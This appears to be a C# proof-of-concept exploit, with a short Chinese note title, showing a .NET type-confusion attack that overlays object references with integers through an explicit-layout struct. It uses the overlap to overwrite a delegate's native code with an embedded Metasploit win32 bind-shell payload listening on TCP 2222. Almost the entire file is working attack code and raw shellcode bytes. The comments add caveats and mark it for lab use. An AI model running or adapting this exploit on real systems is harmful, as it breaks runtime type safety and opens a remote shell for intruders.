- using System;
- using System.IO;
- using System.Threading;
- using System.Text;
- using System.Runtime.InteropServices;
class Union1
{
    // Two plain 4-byte value fields. The `volatile` modifier only constrains how
    // reads/writes of i are ordered; it does not change the field's size, so i and j
    // together occupy 8 bytes - the same footprint as the two references in Union2.
    // Keep the declaration order: i is meant to overlay Union2.o and j Union2.arr.
    public volatile int i;
    public int j;
}
class Union2
{
    // Two reference fields, i.e. two pointers of 4 bytes each in the 32-bit process
    // this PoC assumes. Declaration order matters: o is overlaid by Union1.i and arr
    // by Union1.j, which is how the PoC reads and rewrites them as raw integers.
    public object o;
    public int[] arr;
}
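/// <summary>
/// Type-confusion proof of concept based on yunshu's 《使用安全的C#代码跳出CLR沙箱》
/// ("Escaping the CLR sandbox with safe C# code").
///
/// How it works:
/// 1. Create a delegate (the "method") and an int[].
/// 2. Overlay a class holding two references (Union2) with a class holding two ints
///    (Union1) through an explicit-layout struct, so each reference can be read and
///    written as a plain 32-bit integer - no <c>unsafe</c> code involved.
/// 3. Rewrite the int[] reference so the "array" now covers the delegate object, with
///    element 2 sitting on the slot that holds the delegate's native code pointer.
/// 4. Write through the array: the bytes land on the method's code and run when the
///    delegate is invoked.
///
/// Caveats a practitioner should keep in mind before running this:
///  - The PoC assumes a 32-bit process (every reference and every array element is
///    4 bytes). Main refuses to run when IntPtr.Size is not 4, because in a 64-bit
///    process u1.i would only alias half of a pointer and the array arithmetic would
///    corrupt the heap rather than reach the delegate.
///  - The payload is a Metasploit win32 bind shell on TCP 2222 (see the comment above
///    the byte array). Running this opens a listening shell on the host - lab use only.
///  - The delegate field offsets (_methodPtrAux at array slot 2, base adjusted by 12)
///    and the addresses in the dump below appear to come from one particular CLR build;
///    other runtime versions may lay the delegate out differently and the PoC then
///    crashes or silently does nothing. Whether the overwritten bytes are executable
///    also depends on the process's memory protection (DEP/NX); nothing here checks it.
/// </summary>
class TypeSafetyExploitPoC
{
    /// <summary>
    /// Both fields are pinned to offset 0, so they share the same 4 bytes: a Union2
    /// stored in u2 can be read back through u1 as if it were a Union1. This overlap is
    /// the entire trick. (LayoutKind.Sequential would have placed the fields one after
    /// the other instead.)
    /// </summary>
    [StructLayout(LayoutKind.Explicit)]
    struct UnsafeUnion
    {
        [FieldOffset(0)]
        internal Union1 u1;
        [FieldOffset(0)]
        internal Union2 u2;
    }

    /// <summary>
    /// Placeholder target. Per the original author's notes the PoC overwrites this
    /// method's code through the delegate, so the body is never meant to matter.
    /// </summary>
    static void DummyMethod()
    {
    }

    internal static void Main(string[] args)
    {
        // Everything below treats a reference as a 4-byte int. Refuse to run anywhere
        // else: in a 64-bit process u1.i/u1.j would alias only the low halves of the two
        // pointers and the writes through u2.arr would land on arbitrary heap memory.
        if (IntPtr.Size != 4)
        {
            Console.WriteLine("This PoC only works in a 32-bit process (IntPtr.Size == 4).");
            return;
        }

        Union1 u1;
        Union2 u2 = new Union2();           // holds two references (o, arr), 4 bytes each
        UnsafeUnion uu = new UnsafeUnion(); // explicit layout: u1 and u2 share offset 0
        uu.u2 = u2;                         // because of the overlap, uu.u1 now refers to the same object
        u1 = uu.u1;                         // u1.i and u1.j alias u2.o and u2.arr as raw 32-bit values
        ThreadStart del = new ThreadStart(DummyMethod);
        u2.o = del;                         // u1.i now holds the address of the delegate object
        u1.j = u1.i;                        // make u2.arr "point" at the delegate object
        // Re-point u2.arr at the code address stored in _methodPtrAux (array slot 2, see
        // the dump below), minus 12. The 12 presumably cancels the 0xc offset of element 1
        // shown in the dump, so the loop below - which starts writing at arr[1] - lands on
        // the method's code itself. Verify against the target runtime before relying on it.
        u1.j = u2.arr[2] - 12;

        /* The delegate object viewed as an int[] (4-byte elements) on the CLR build the
           original author used:
           790fd0f0 40000ff 4 System.Object 0 instance 021a1744 _target        --> invocation source
           7910ebc8 4000100 8 ...ection.MethodBase 0 instance 021a18fc _methodBase --> array[0]
           791016bc 4000101 c System.IntPtr 1 instance 007C09FC _methodPtr    --> array[1]
           791016bc 4000102 10 System.IntPtr 1 instance 0029C040 _methodPtrAux --> array[2]; the shellcode goes in front of this
         */

        #region overwrite the "array" contents, i.e. the method's code
        // win32_bind - EXITFUNC=thread LPORT=2222 Size=344 Encoder=PexFnstenvSub http://metasploit.com
        // The bytes are copied straight from this array; the MemoryStream/BinaryWriter
        // round trip of the original was a no-op (and leaked two undisposed streams).
        byte[] shellcode = {
            0x29, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, 0x0e,
            0x4b, 0x46, 0x7e, 0x83, 0xeb, 0xfc, 0xe2, 0xf4, 0xf2, 0x21, 0xad, 0x33, 0xe6, 0xb2, 0xb9, 0x81,
            0xf1, 0x2b, 0xcd, 0x12, 0x2a, 0x6f, 0xcd, 0x3b, 0x32, 0xc0, 0x3a, 0x7b, 0x76, 0x4a, 0xa9, 0xf5,
            0x41, 0x53, 0xcd, 0x21, 0x2e, 0x4a, 0xad, 0x37, 0x85, 0x7f, 0xcd, 0x7f, 0xe0, 0x7a, 0x86, 0xe7,
            0xa2, 0xcf, 0x86, 0x0a, 0x09, 0x8a, 0x8c, 0x73, 0x0f, 0x89, 0xad, 0x8a, 0x35, 0x1f, 0x62, 0x56,
            0x7b, 0xae, 0xcd, 0x21, 0x2a, 0x4a, 0xad, 0x18, 0x85, 0x47, 0x0d, 0xf5, 0x51, 0x57, 0x47, 0x95,
            0x0d, 0x67, 0xcd, 0xf7, 0x62, 0x6f, 0x5a, 0x1f, 0xcd, 0x7a, 0x9d, 0x1a, 0x85, 0x08, 0x76, 0xf5,
            0x4e, 0x47, 0xcd, 0x0e, 0x12, 0xe6, 0xcd, 0x3e, 0x06, 0x15, 0x2e, 0xf0, 0x40, 0x45, 0xaa, 0x2e,
            0xf1, 0x9d, 0x20, 0x2d, 0x68, 0x23, 0x75, 0x4c, 0x66, 0x3c, 0x35, 0x4c, 0x51, 0x1f, 0xb9, 0xae,
            0x66, 0x80, 0xab, 0x82, 0x35, 0x1b, 0xb9, 0xa8, 0x51, 0xc2, 0xa3, 0x18, 0x8f, 0xa6, 0x4e, 0x7c,
            0x5b, 0x21, 0x44, 0x81, 0xde, 0x23, 0x9f, 0x77, 0xfb, 0xe6, 0x11, 0x81, 0xd8, 0x18, 0x15, 0x2d,
            0x5d, 0x18, 0x05, 0x2d, 0x4d, 0x18, 0xb9, 0xae, 0x68, 0x23, 0x4e, 0xd0, 0x68, 0x18, 0xcf, 0x9f,
            0x9b, 0x23, 0xe2, 0x64, 0x7e, 0x8c, 0x11, 0x81, 0xd8, 0x21, 0x56, 0x2f, 0x5b, 0xb4, 0x96, 0x16,
            0xaa, 0xe6, 0x68, 0x97, 0x59, 0xb4, 0x90, 0x2d, 0x5b, 0xb4, 0x96, 0x16, 0xeb, 0x02, 0xc0, 0x37,
            0x59, 0xb4, 0x90, 0x2e, 0x5a, 0x1f, 0x13, 0x81, 0xde, 0xd8, 0x2e, 0x99, 0x77, 0x8d, 0x3f, 0x29,
            0xf1, 0x9d, 0x13, 0x81, 0xde, 0x2d, 0x2c, 0x1a, 0x68, 0x23, 0x25, 0x13, 0x87, 0xae, 0x2c, 0x2e,
            0x57, 0x62, 0x8a, 0xf7, 0xe9, 0x21, 0x02, 0xf7, 0xec, 0x7a, 0x86, 0x8d, 0xa4, 0xb5, 0x04, 0x53,
            0xf0, 0x09, 0x6a, 0xed, 0x83, 0x31, 0x7e, 0xd5, 0xa5, 0xe0, 0x2e, 0x0c, 0xf0, 0xf8, 0x50, 0x81,
            0x7b, 0x0f, 0xb9, 0xa8, 0x55, 0x1c, 0x14, 0x2f, 0x5f, 0x1a, 0x2c, 0x7f, 0x5f, 0x1a, 0x13, 0x2f,
            0xf1, 0x9b, 0x2e, 0xd3, 0xd7, 0x4e, 0x88, 0x2d, 0xf1, 0x9d, 0x2c, 0x81, 0xf1, 0x7c, 0xb9, 0xae,
            0x85, 0x1c, 0xba, 0xfd, 0xca, 0x2f, 0xb9, 0xa8, 0x5c,
            0xb4, 0x96, 0x16, 0xe1, 0x85, 0xa6, 0x1e, 0x5d, 0xb4, 0x90, 0x81, 0xde, 0x4b, 0x46, 0x7e };

        try
        {
            // Copy the payload one 4-byte element at a time, starting at slot 1. Trailing
            // bytes that do not fill a whole element would be dropped; the payload above
            // is exactly 344 bytes, a multiple of 4, so nothing is lost here.
            for (int i = 0; i < shellcode.Length / 4; i++)
            {
                u2.arr[1 + i] = BitConverter.ToInt32(shellcode, i * 4);
            }
            // Invoking the delegate now transfers control to the bytes just written.
            del();
        }
        catch (Exception e)
        {
            // The original swallowed everything here, which hides a layout mismatch on a
            // different CLR build; at least report what went wrong.
            Console.WriteLine("Exploit failed: " + e.Message);
        }
        #endregion
    }
}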
.net exploit poc 笔记